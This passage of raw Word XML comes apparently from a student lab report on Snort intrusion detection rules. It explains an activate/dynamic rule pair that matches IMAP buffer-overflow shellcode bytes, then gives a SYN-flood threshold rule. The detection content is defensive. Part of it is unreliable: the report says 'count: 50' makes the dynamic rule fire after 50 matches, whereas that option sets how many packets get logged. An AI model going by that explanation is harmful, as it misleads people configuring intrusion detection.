          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C7436E5" w14:textId="27B44CAE" w:rsidR="009A1C25" w:rsidRPr="00E52AD2" w:rsidRDefault="00E52AD2" w:rsidP="00E52AD2">
      <w:pPr>
        <w:ind w:left="-360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E52AD2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">4.1.  </w:t>
      </w:r>
      <w:r w:rsidR="00067479" w:rsidRPr="00E52AD2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Explain Snort rules</w:t>
      </w:r>
      <w:r w:rsidR="00067479" w:rsidRPr="00E52AD2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F3E98C2" w14:textId="090C8595" w:rsidR="00067479" w:rsidRDefault="00067479" w:rsidP="00E52AD2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="180" w:right="-360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00067479">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>The provided Snort rules are used for detecting and alerting potential IMAP (Internet Message Access Protocol) buffer overflow attacks. Let's break down each part of the rules:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="406D49EB" w14:textId="201396BF" w:rsidR="00067479" w:rsidRDefault="00E52AD2" w:rsidP="00E52AD2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="180" w:right="-360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">1.  </w:t>
      </w:r>
      <w:r w:rsidR="00067479">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Rule 1:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C9B0F43" w14:textId="6D47C271" w:rsidR="00067479" w:rsidRDefault="00067479" w:rsidP="00E52AD2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="180" w:right="-360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00067479">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>activate tcp !$HOME_NET any-&gt; $HOME_NET 143 (flags: PA; \content:"|E8C0FFFFFF|/bin"; activates: 1; \msg:"IMAP buffer overflow!";)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74FB626F" w14:textId="7803CCF1" w:rsidR="00067479" w:rsidRDefault="00067479" w:rsidP="00E52AD2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:ind w:right="-360" w:hanging="270"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00067479">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>activate</w:t>
      </w:r>
      <w:r w:rsidRPr="00067479">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>: This keyword indicates that the rule is meant to activate another rule or set of rules when certain conditions are met.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44DA2586" w14:textId="15E06AA5" w:rsidR="00067479" w:rsidRDefault="00067479" w:rsidP="00772F79">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:ind w:right="-360" w:hanging="270"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00067479">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>tcp !$HOME_NET any -&gt; $HOME_NET 143</w:t>
      </w:r>
      <w:r w:rsidRPr="00067479">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>: Specifies the network traffic flow. It checks for TCP traffic from any source IP to the destination IP within the defined HOME_NET network, on port 143 (the standard IMAP port).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D67FC27" w14:textId="0244BCBF" w:rsidR="00067479" w:rsidRDefault="00067479" w:rsidP="00772F79">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:ind w:right="-360" w:hanging="270"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00067479">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>(flags: PA; \content:"|E8C0FFFFFF|/bin";)</w:t>
      </w:r>
      <w:r w:rsidRPr="00067479">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>: Defines the specific conditions for activating the rule. In this case, it checks for TCP packets with the "PUSH" and "ACK" flags set (PA). It also looks for a specific content match of the hexadecimal string "|E8C0FFFFFF|/bin" within the packet payload. This content match is likely the signature of a known IMAP buffer overflow attack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22098FBB" w14:textId="7D8016DF" w:rsidR="00067479" w:rsidRDefault="003005BC" w:rsidP="00772F79">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:ind w:right="-360" w:hanging="270"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003005BC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>activates: 1;</w:t>
      </w:r>
      <w:r w:rsidRPr="003005BC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>: Specifies that this rule will activate another rule or set of rules with an ID of 1 when the conditions are met. This means that once the conditions in this rule are satisfied, the specified rule(s) will be activated for further analysis.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54D7C9A7" w14:textId="0620984B" w:rsidR="003005BC" w:rsidRDefault="003005BC" w:rsidP="00772F79">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:ind w:right="-360" w:hanging="270"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003005BC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>\msg:"IMAP buffer overflow!";</w:t>
      </w:r>
      <w:r w:rsidRPr="003005BC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>: Provides a human-readable message that will be included in the generated alert if the rule is triggered. In this case, it indicates that the alert is related to an IMAP buffer overflow.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B7F1BD6" w14:textId="77777777" w:rsidR="00E52AD2" w:rsidRPr="00E52AD2" w:rsidRDefault="00E52AD2" w:rsidP="00E52AD2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="180" w:right="-360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E1951BA" w14:textId="7518BB79" w:rsidR="003005BC" w:rsidRPr="003A55F7" w:rsidRDefault="003A55F7" w:rsidP="003A55F7">
      <w:pPr>
        <w:ind w:left="-360" w:right="-360" w:firstLine="540"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">2.  </w:t>
      </w:r>
      <w:r w:rsidR="003005BC" w:rsidRPr="003A55F7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Rule 2:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7355CCA3" w14:textId="6C1C090B" w:rsidR="003005BC" w:rsidRDefault="003005BC" w:rsidP="003A55F7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="0" w:right="-360" w:firstLine="180"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003005BC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>dynamic tcp !$HOME_NET any-&gt; $HOME_NET 143 (activated_by:1; count: 50;)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A93E116" w14:textId="6BB4CD6E" w:rsidR="003005BC" w:rsidRDefault="003005BC" w:rsidP="000C3E1F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:ind w:left="360" w:right="-360" w:firstLine="90"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003005BC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>dynamic</w:t>
      </w:r>
      <w:r w:rsidRPr="003005BC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>: This keyword is used to define a dynamic rule. Dynamic rules are dependent on another rule or set of rules for activation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1239D88B" w14:textId="38569F3D" w:rsidR="003005BC" w:rsidRDefault="003005BC" w:rsidP="000C3E1F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:ind w:left="360" w:right="-360" w:firstLine="90"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003005BC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>tcp !$HOME_NET any -&gt; $HOME_NET 143</w:t>
      </w:r>
      <w:r w:rsidRPr="003005BC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>: Specifies the network traffic flow, similar to Rule 1.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E27ACEA" w14:textId="2DAA4FD6" w:rsidR="003005BC" w:rsidRDefault="003005BC" w:rsidP="000C3E1F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:ind w:left="360" w:right="-360" w:firstLine="90"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003005BC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>(activated_by:1; count: 50;)</w:t>
      </w:r>
      <w:r w:rsidRPr="003005BC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>: Indicates that this dynamic rule is activated by Rule 1 (with ID 1). It also specifies that the dynamic rule should be triggered after the activating rule is matched 50 times. This is useful for controlling the frequency of alerts generated by the dynamic rule.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79C5A04D" w14:textId="77777777" w:rsidR="003005BC" w:rsidRDefault="003005BC" w:rsidP="003005BC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360" w:right="-360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1003F028" w14:textId="1685E458" w:rsidR="00A710D0" w:rsidRDefault="003005BC" w:rsidP="000C3E1F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="180" w:right="-360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidRPr="003005BC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>hese Snort rules are designed to detect IMAP buffer overflow attacks. Rule 1 identifies the specific conditions that trigger the activation of another rule or set of rules. Rule 2 is a dynamic rule that is activated by Rule 1 and generates alerts based on the specified conditions after the activating rule is matched a certain number of times.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2995BD5E" w14:textId="708E77DE" w:rsidR="00A710D0" w:rsidRDefault="00A710D0" w:rsidP="00A710D0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="-360" w:right="-360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24996CBF" w14:textId="4820458D" w:rsidR="00A710D0" w:rsidRDefault="00FE2CCF" w:rsidP="00A710D0">
      <w:pPr>
        <w:ind w:left="-360" w:right="-360" w:hanging="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>4.2</w:t>
      </w:r>
      <w:r w:rsidR="00A710D0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">.  </w:t>
      </w:r>
      <w:r w:rsidR="00A710D0" w:rsidRPr="00A710D0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Design Snort rule to prevent TCP SYN Flooding attack</w:t>
      </w:r>
      <w:r w:rsidR="00A710D0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41C3102D" w14:textId="03D520E5" w:rsidR="00A710D0" w:rsidRDefault="00C139C5" w:rsidP="00DB603A">
      <w:pPr>
        <w:ind w:left="-180" w:right="-360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C139C5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Snort is an open-source intrusion detection and prevention system (IDS/IPS) that is widely used for network security monitoring. It analyzes network traffic in real-time, detects potential threats or attacks, and generates alerts or takes action to prevent them.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="225B9383" w14:textId="32A4F532" w:rsidR="00C139C5" w:rsidRDefault="00C139C5" w:rsidP="00DB603A">
      <w:pPr>
        <w:ind w:left="-180" w:right="-360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Snort rule example to prevent TCP SYN Flooding attacks:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D5F5BD9" w14:textId="72DFC51D" w:rsidR="00C139C5" w:rsidRDefault="00C139C5" w:rsidP="00DB603A">
      <w:pPr>
        <w:ind w:left="-180" w:right="-360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C139C5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>alert tcp any any -&gt; $HOME_NET any (flags: S; threshold: type both, track by_src, count 100, seconds 10; msg: "TCP SYN Flood detected"; sid: 100001; rev: 1;)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D99E2FF" w14:textId="520C863B" w:rsidR="00C139C5" w:rsidRDefault="005D2F85" w:rsidP="00DB603A">
      <w:pPr>
        <w:ind w:left="-180" w:right="-360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Explanation of the rule:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="458666EA" w14:textId="0A7B7A3E" w:rsidR="005D2F85" w:rsidRDefault="00DB603A" w:rsidP="00DB603A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:ind w:left="-180" w:right="-360" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005D2F85" w:rsidRPr="005D2F85">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>alert</w:t>
      </w:r>
      <w:r w:rsidR="005D2F85" w:rsidRPr="005D2F85">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>: Specifies that an alert should be generated if the condition is met.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="653B348C" w14:textId="3E0D4B21" w:rsidR="005D2F85" w:rsidRDefault="00DB603A" w:rsidP="00DB603A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:ind w:left="-180" w:right="-360" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005D2F85" w:rsidRPr="005D2F85">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>tcp any any -&gt; $HOME_NET any</w:t>
      </w:r>
      <w:r w:rsidR="005D2F85" w:rsidRPr="005D2F85">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>: Defines the network traffic flow. It looks for TCP packets from any source IP and any source port to any destination IP within the defined HOME_NET network.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AF5401F" w14:textId="1F080A15" w:rsidR="005D2F85" w:rsidRDefault="00DB603A" w:rsidP="00DB603A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:ind w:left="-180" w:right="-360" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005D2F85" w:rsidRPr="005D2F85">
        <w:rPr>
